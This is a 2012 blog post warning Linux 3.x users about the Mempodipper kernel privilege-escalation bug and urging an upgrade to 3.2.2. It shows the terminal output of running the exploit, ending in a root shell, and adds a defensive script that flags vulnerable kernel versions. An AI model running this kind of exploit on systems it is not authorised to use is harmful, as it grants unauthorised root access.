Friday, January 27, 2012

Mempodipper Bug

For those who are running a Linux Kernel 3.x: there is a serious bug in the Linux kernel that can be misused for local privilege escalation via a suid binary, which is well explained on this site.

The solution is quite easy: all you need to do is upgrade to the latest Linux Kernel, 3.2.2, and you should be safe.

Here's what you will get when you are running a vulnerable kernel:
bash-4.1$ ./mempodipper
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/3765/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Ptracing su to find next instruction without reading binary.
[+] Resolved exit@plt to 0x80499e8.
[+] Calculating su padding.
[+] Seeking to offset 0x80499dc.
[+] Executing su with shellcode.
sh-4.1# id
uid=0(root) gid=0(root)

Quite nasty, huh? So what are you waiting for? Go to the kernel site and grab the latest version (3.2.2 at minimum).
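As an added example (not from the original post or from the exploit author), here is a small POSIX sh helper that applies this post's advice to a kernel release string: a 3.x kernel older than 3.2.2 is flagged as needing the upgrade. The function name `needs_upgrade` and the sample release strings are my own; distribution kernels often backport fixes without bumping the version, so treat a hit as a prompt to check your vendor's advisory rather than proof.

```shell
#!/bin/sh
# Added example: decide from a kernel release string whether it falls in the
# range this post says to upgrade away from (3.x below 3.2.2).

# needs_upgrade RELEASE
#   Returns 0 (true) when RELEASE is a 3.x kernel older than 3.2.2,
#   1 otherwise. Suffixes such as "-rc1", "-12-generic" are stripped first.
#   Note: the post only talks about 3.x, so other major versions return 1.
needs_upgrade() {
    rel=$1
    # Keep only the leading dotted-numeric part: "3.2.1-rc2-amd64" -> "3.2.1"
    num=$(printf '%s\n' "$rel" | sed 's/^\([0-9][0-9.]*\).*/\1/')
    # Split on "." into positional parameters (POSIX word splitting).
    oldifs=$IFS
    IFS=.
    set -- $num
    IFS=$oldifs
    major=${1:-0}
    minor=${2:-0}
    patch=${3:-0}
    [ "$major" -eq 3 ] || return 1
    [ "$minor" -lt 2 ] && return 0
    [ "$minor" -eq 2 ] && [ "$patch" -lt 2 ] && return 0
    return 1
}

# check_running_kernel
#   Prints a verdict for the running kernel (uname -r); exit status mirrors
#   needs_upgrade so it can be used in scripts.
check_running_kernel() {
    running=$(uname -r)
    if needs_upgrade "$running"; then
        echo "kernel $running: upgrade to 3.2.2 or later (verify with your distro advisory)"
        return 0
    fi
    echo "kernel $running: not flagged by version (backported fixes are not detectable this way)"
    return 1
}

# Constructed sample values to show the decision on a few release strings.
for sample in 3.0.0-12-generic 3.1.9 3.2.1-rc1 3.2.2 3.3.0; do
    if needs_upgrade "$sample"; then
        echo "$sample -> needs upgrade"
    else
        echo "$sample -> ok by version"
    fi
done
```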